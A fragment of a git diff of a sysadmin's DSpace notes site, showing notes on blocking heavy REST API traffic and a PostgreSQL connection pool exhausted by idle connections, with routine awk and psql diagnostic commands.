                                                                                                                                                                                                                                                                                                                                                                text_value
                                                                                                                                                                                                                                                                                                                                                               ------------
                                                                                                                                                                                                                                                                                                                                                               (0 rows)
                                                                                                                                                                                                                                                                                                                                                              @@ -261,7 +261,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                            • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                            • There are 3,000 IPs accessing the REST API in a 24-hour period!
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                             3168
                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                            Read more → diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html index 84eae3a2f..39c33e266 100644 --- a/docs/tags/notes/page/3/index.html +++ b/docs/tags/notes/page/3/index.html @@ -17,7 +17,7 @@ - + @@ -146,7 +146,7 @@
                                                                                                                                                                                                                                                                                                                                                          • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                          • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                          $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                           78
                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                          Read more →